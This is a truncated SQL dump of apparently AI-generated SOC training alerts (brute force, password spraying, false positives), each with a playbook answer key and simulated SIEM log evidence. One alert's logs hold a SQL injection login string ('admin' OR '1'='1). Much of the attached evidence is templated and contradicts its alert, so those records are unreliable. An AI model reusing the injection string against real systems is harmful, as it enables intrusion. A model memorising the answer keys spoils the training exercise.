count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:28:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.78\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"core-server\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-15T20:56:15.972Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:28:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.78\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"core-server\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-15T20:55:15.972Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:28:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.78\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"core-server\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-15T20:54:15.972Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:28:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.78\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"core-server\\\",\\\"failed_attempts\\\":45}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1685, 'Potential Password Spraying Detected', 'medium', 'Elastic SIEM', 'An external IP address has been attempting multiple logins, possibly indicating a password spraying attempt.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:31:29Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.67\",\"dst_ip\":\"192.168.1.15\",\"username\":\"user1\",\"hostname\":\"company-portal\",\"failed_attempts\":35}', '2026-03-15 19:40:23', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous password spraying incidents\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"user1\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Username targeted in the attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The pattern of failed attempts and external IP reputation confirm the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.974Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:31:29Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"company-portal\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-15T20:57:15.974Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event 
count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:31:29Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"company-portal\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-15T20:56:15.974Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:31:29Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"company-portal\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-15T20:55:15.974Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:31:29Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"company-portal\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-15T20:54:15.974Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:31:29Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"company-portal\\\",\\\"failed_attempts\\\":35}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1686, 'False Positive: Authorized User Activity', 'low', 'Splunk', 'Detected login attempts from an internal IP by an authorized user, not a security threat.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:05:59Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.168.0.50\",\"dst_ip\":\"192.168.0.60\",\"username\":\"authorized_user\",\"hostname\":\"internal-server\",\"failed_attempts\":0}', '2026-03-15 19:40:23', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP used by authorized personnel\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"authorized_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Authorized user for internal systems\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity is legitimate, originating from a known user and IP.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.979Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:59Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.50\\\",\\\"dst_ip\\\":\\\"192.168.0.60\\\",\\\"username\\\":\\\"authorized_user\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":0}\"},{\"timestamp\":\"2026-03-15T20:57:15.979Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:59Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.50\\\",\\\"dst_ip\\\":\\\"192.168.0.60\\\",\\\"username\\\":\\\"authorized_user\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":0}\"},{\"timestamp\":\"2026-03-15T20:56:15.979Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:59Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.50\\\",\\\"dst_ip\\\":\\\"192.168.0.60\\\",\\\"username\\\":\\\"authorized_user\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":0}\"},{\"timestamp\":\"2026-03-15T20:55:15.979Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:59Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.50\\\",\\\"dst_ip\\\":\\\"192.168.0.60\\\",\\\"username\\\":\\\"authorized_user\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":0}\"},{\"timestamp\":\"2026-03-15T20:54:15.979Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:59Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.50\\\",\\\"dst_ip\\\":\\\"192.168.0.60\\\",\\\"username\\\":\\\"authorized_user\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":0}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1687, 'Password Spraying Attack Detected on Internal Web Portal', 'high', 'Splunk', 'Multiple failed login attempts detected from a foreign IP address targeting the internal web portal. This indicates a potential password spraying attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T05:34:22Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.1.1.5\",\"username\":\"jdoe\",\"hostname\":\"webportal01\",\"request_body\":null,\"command_line\":null}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the web portal\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"Internal user account involved in the attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The foreign IP has a history of brute force attempts, confirming the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.981Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:34:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.1.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"webportal01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:57:15.981Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:34:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.1.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"webportal01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:56:15.981Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:34:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.1.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"webportal01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:55:15.981Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:34:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.1.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"webportal01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:54:15.981Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:34:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.1.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"webportal01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1688, 'SSH Brute Force Spike Detected', 'critical', 'Elastic SIEM', 'A significant increase in SSH login failures from an external IP indicates a brute force attack against the server.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T07:45:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.100\",\"username\":\"admin\",\"hostname\":\"server01\",\"request_body\":null,\"command_line\":null}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple SSH brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal server IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"Commonly targeted admin account\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"IP has a history of malicious activity, confirming its involvement in the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.983Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:45:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:57:15.983Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:45:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:56:15.983Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:45:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:55:15.983Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:45:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:54:15.983Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:45:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1689, 'Unusual Login Attempt Detected', 'medium', 'Azure Sentinel', 'A login attempt from a previously unseen IP address was detected on an administrator account.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:12:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.5\",\"dst_ip\":\"10.2.2.20\",\"username\":\"administrator\",\"hostname\":\"adserver01\",\"request_body\":null,\"command_line\":null}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP previously reported for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"High-value target user account\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.2.2.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the administrative server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP\'s history of unauthorized access confirms the attack vector.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:12:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.5\\\",\\\"dst_ip\\\":\\\"10.2.2.20\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"adserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:57:15.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:12:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.5\\\",\\\"dst_ip\\\":\\\"10.2.2.20\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"adserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:56:15.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:12:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.5\\\",\\\"dst_ip\\\":\\\"10.2.2.20\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"adserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:55:15.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:12:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.5\\\",\\\"dst_ip\\\":\\\"10.2.2.20\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"adserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:54:15.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:12:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.5\\\",\\\"dst_ip\\\":\\\"10.2.2.20\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"adserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1690, 'Failed SSH Login from Known Safe Network', 'low', 'Wazuh', 'A failed SSH login attempt was detected from a known safe network. No further activity was observed.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:23:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.0.2.0\",\"dst_ip\":\"10.0.0.10\",\"username\":\"user1\",\"hostname\":\"sshserver01\",\"request_body\":null,\"command_line\":null}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.0\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"IP belongs to a trusted network and shows no signs of malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the SSH server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP is from a known safe network, indicating a benign activity.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.988Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.0\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"sshserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:57:15.988Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 
49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:45Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.0\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"sshserver01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:56:15.988Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 